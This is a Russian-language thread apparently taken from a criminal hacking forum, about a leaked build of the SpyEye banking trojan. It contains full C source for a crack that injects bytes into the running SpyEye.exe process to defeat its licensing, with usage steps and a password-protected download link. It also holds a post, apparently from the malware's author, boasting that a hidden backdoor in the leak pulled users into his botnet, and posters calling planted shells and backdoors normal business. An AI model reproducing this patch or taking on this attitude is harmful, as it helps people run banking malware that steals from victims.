• XSS.stack #1 – первый литературный журнал от юзеров форума

Spy-Eye Leaked

ПИЗ_ЕЦ!
Мало_того, что в соф гавно пихают, да есче нихуя не стесняюццо этого!
ЗЫ
Дупло может быть и в админке, так что ... Как бы то ни было репутация подмочена smile.gif
плюсспиццот, сплоеты с шеллами и скрытыми юзерами не кто не отменял.
Сталобыть, горемыка пакупатель, мало того, что на стороне буит шерстить билд, (за шекеле)так есче и одминку буит разбирать по строчкам =\
а есле одминка буит норм обусифицированна, так вааще пизд_ц! Хехе....
 
х) ай да молодцА =)))) весь нароД на**л =)))


Кстати, а как отличаешь "нищебродов" от твоих законных клиентов кто тебе в свое время башлял ?

P.S. Получается те кто башлял и имел кого то, просто оказались "прокси-презервативом" и автор весь смак имел, а заодно и их самих
 
нароД на**л =)))
ну пока не доказано. бэкдор - паршиво, но еще сам по себе не преступление, пока не задействован.
я на днях крупно пожалела, что не оставила в скриптах сайта заказчицы ничего.
пользуясь ее наивностью, сайт увели, кинулась ко мне со слезами.
пришлось показывать воришке профили на здесь и на античате, спокойненько намекнула, что мне как-нибудь, чем-нибудь но помогут ( я промолчала о черных сео-методах).
помогло.
но мог оказаться кто-то и понаглее. тогда шелл бы не помешал

а автор скрипта мне нравится целеустремленностью.
 
Скажу фразу из одного не очень популярного аниме .hack

Для продавца самое важное - это доверие к покупателям.

ЗЫ: кстати я тоже считаю автором молодца, сделал все красиво. В этом бизнесе я считаю - это нормально. Он же не телефоны с бекдорами продает. Какой биз, такие и методы =)
 
//======Люказ филмз...=====\\
//===Совмесно с Дамлаб пикчерз...===\\
//=========предстовляет! ==========\\
//================Мессага I==================\\

Давным давно,
в забытой богом дыре
жил_был...


Жил был чувачог, небритый, грязный и ванючий, телке етому убожэство не "довале", (ибо денег хвотало тока на пачку "Примы" и на инторнет, где наш герой и проводил все время на хард_парнущных сайтах) .
И вот как_то рас, зашол к нему кореш с гостинцем, кореш (в лихие 90_е умудорилсо зороботать (спиздеть, ноебать, подрезать и тд...) 100-150кб...., деловой, что неебаццо!
Деловой до усрачке, пажрать нормально было некогдо, сталобыть иногда ховал "Дошираг", "Дошераг" канешно гавно редкосное, но там быле пидатые ароматезаторы, каторые довале ебанничесскей слюноотог, и нобевале желудог
всячесскими енгродиентаме...жэлудку канешно не похуй, и лопша не придовала элементов для роста и жинедеятельносте, но довала эффект сытости и умеротвореня, что хозяену жэлудка и надо было.
Вот сидели они, с упоением ховале Е-420 и зотягивались "Примой".
Кореш грит,
-"Вот_бэ свае производство ноладить, жрали бэ каждый день, на 12рублеков_бэ не прилипале, а есчо и бабке бэ каполе!"
Герой наш, был канешно задрод конченный, но бля умный, в химии шорел неебаццо! и дома была хоть и самопальная, но внушающая уважэние, прошлого века, хим лоборатория.
_"Гавно вапрос!"_грит он,
_"Щя сделоем хим оналез!"
Реверснул он "Дошераг", и грит.
_"Лапша канешно мудренно придумона, но подделать можно, там DLL_ка, тут DLL_ка, и гавно вапрос, можно впаривать гораздо дешевле, "нищеброды" сховоют. Да и себестоимость гавенная "
Прикинул чо_как, чо_носу, евойный кореш, и грит,
-"Ахуеено! а я те слеплю фантик пиздайтый, те оболчку, те кросивую одминку! и сделою пиздатую пеар компанию, и начнем биз..." Долго_ли, коротко_ли, но результат был...
Лапша палучилась канешно гавенная, но на рынке, благодоря неебаццо пиару, эффект произвела!
Хотя по существу, конченное гавно(http://anubis.iseclab.org/?action=result&task_id=1f6a73bc148ab8fe4d5a30ae498b0bd56&format=html), в отличии от исходного материала(https://zeustracker.abuse.ch/faq.php),...
Но народ сховал, и не пиздел,... пакупал, пакупал, пакупал и ховал, ховал, и пакупал......
Но!
"Нищеброды" не вкурсе быле, что наш герой не пальцем делонный, и неебаццо далеко просчитал розвитие ситуации, а имеено то, что нерадивые "Нищеброды" могут купить его фольсефекат и "барыжить" им.
Паэтому он решил сделоть "ход канем", те тупа хуярил апарышей в свой продукт!
Те, норм люди, "Дошераге" один х#й не ховают, "Дошираге" ховают тока "Нищеброды", а им можно и генно_модифицированных апарышей подложить, каторые сроботают по свистку. (Какму свистку?, Это знал тока наш герой)
И вот настал час и день "Х"...
Когда одновременно, всех "Нищебродов", настиг яросный лучь диареи.
Это был звезный час нашего героя.
Телке каншно ему как не довале так и не дале, зато наш герой палучил (по его мнению) несравненно большее удовольствие... ибо по его мнению "Хуячить сваих "Нищебродов", штоб остальные усрались!" Это дар "Божэственной тени", оргазм несравненный не с чем...
"Ннищеброды" кнешно прихуле, и ответеле...
Но это другая история....

//===.....Продолжэние следует ===\\

\\================================//
 
SpyEye 1.2.50+patch+admin panel
v12t.th.jpg

3110.th.png


src of patch by Zer0Flag
Код:
#include <Windows.h>
#include <tlhelp32.h>

typedef LONG ( NTAPI *_NtSuspendProcess )( IN HANDLE ProcessHandle );
typedef LONG ( NTAPI *_NtResumeProcess )( IN HANDLE ProcessHandle );

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {

    TOKEN_PRIVILEGES priv;
    HANDLE hThis, hToken;
    LUID luid;
    hThis = GetCurrentProcess();
    OpenProcessToken(hThis, TOKEN_ADJUST_PRIVILEGES, &hToken);
    LookupPrivilegeValue(0, "seDebugPrivilege", &luid);
    priv.PrivilegeCount = 1;
    priv.Privileges[0].Luid = luid;
    priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, false, &priv, 0, 0, 0);
    CloseHandle(hToken);
    CloseHandle(hThis);

    HANDLE ProcessHandle = 0;
    _NtSuspendProcess NtSuspendProcess = 0;
    _NtResumeProcess NtResumeProcess = 0;
    PROCESSENTRY32 processInfo;
    processInfo.dwSize = sizeof(processInfo);
    HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    CHAR processName[] = "SpyEye.exe";
    DWORD PID = 0 ;


    DWORD Patch1 = 0x4010CE;
    DWORD Patch2 = 0x4010D3;
    DWORD Patch3 = 0x4010D5;
    DWORD Patch4 = 0x4010D6;

    UCHAR PatchVal1[] = "\xB8\x13\x11\x40\x00";
    UCHAR PatchVal2[] = "\xFF\xD0";
    UCHAR PatchVal3[] = "\x90";
    UCHAR PatchVal4[] = "\x90";


    NtSuspendProcess = (_NtSuspendProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtSuspendProcess" );
    NtResumeProcess = (_NtResumeProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtResumeProcess" );


    if ( processesSnapshot == INVALID_HANDLE_VALUE ){
        return 0;
    }
    Process32First(processesSnapshot, &processInfo);

    while ( Process32Next(processesSnapshot, &processInfo)){
        if ( !strcmp(processName,processInfo.szExeFile)){
            CloseHandle(processesSnapshot);
            PID = processInfo.th32ProcessID;
            break;
        }
    }
    if(PID != NULL){
        //MessageBoxA(NULL,(LPCSTR)PID,"SpyEye.exe - PID",0);    
        ProcessHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, PID);
    }
    if ( ProcessHandle != NULL ){
        NtSuspendProcess( ProcessHandle );
        
        WriteProcessMemory(ProcessHandle, (LPVOID)Patch1, &PatchVal1, sizeof(PatchVal1)-1, NULL);
        WriteProcessMemory(ProcessHandle, (LPVOID)Patch2, &PatchVal2, sizeof(PatchVal2)-1, NULL);
        WriteProcessMemory(ProcessHandle, (LPVOID)Patch3, &PatchVal3, sizeof(PatchVal3)-1, NULL);
        WriteProcessMemory(ProcessHandle, (LPVOID)Patch4, &PatchVal4, sizeof(PatchVal4)-1, NULL);
        /*
        004010CE   B8 13114000      MOV EAX,SpyEye.00401113
        004010D3   FFD0             CALL EAX
        004010D5   90               NOP
        004010D6   90               NOP
        */
        MessageBoxA(NULL,"SpyEye should have been patched now.\nJust press OK and enjoy","SpyEye-Patch by Zer0Flag",0);

        NtResumeProcess( ProcessHandle );
        CloseHandle(ProcessHandle);
    }
    return 0;
}

Как патчить ?
1.Запускаем SpyEye.exe (вылетает ошибка)
2.Запускаем SpyEyePatch.exe (окно с ошибкой не закрывать)
3.Перезапускаем SpyEye.exe

:zns5: Скачать
pass:xss.pro/


ПС:Все вроде чистое...
 
image.png

забавно, но новый тоже ломается.
хочу обратить внимание что когда ключ в папке и запускается билдер нормально, то написано что инжекты включены, когда через патч - выключены
 
Ах да. Забыл сказать что...
В "утёкшей" версии же ещё бэкдорчик был, который я сейчас активировал.

Обращение к тем, кто пытался заюзать "утёкшую" версию:
"Спасибо вам, нищеброды, за пополнение моего ботнета! =) Если это называется cracked, то ломайте дальше. Я только за."

негоже их туда вставлять,а то мало ли еще случиться так что кто-то третий начнет уводить ботнет сети одну за другой ч/з твой бэкдур ..хыхы ;)
 
gribodemon,всегда пожалуйста,ты увел целую виртуальную машину.Я уверен ты снимешь оттуда банк акк с балансом милльён долларов=))

По отстуку бот кстатьи г полное,зачем это покупать...


ps кряк выложенный тут не работает,у меня по крайней мере.

http://www.youtube.com/watch?v=ExxUy6mLSxs - кряк
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх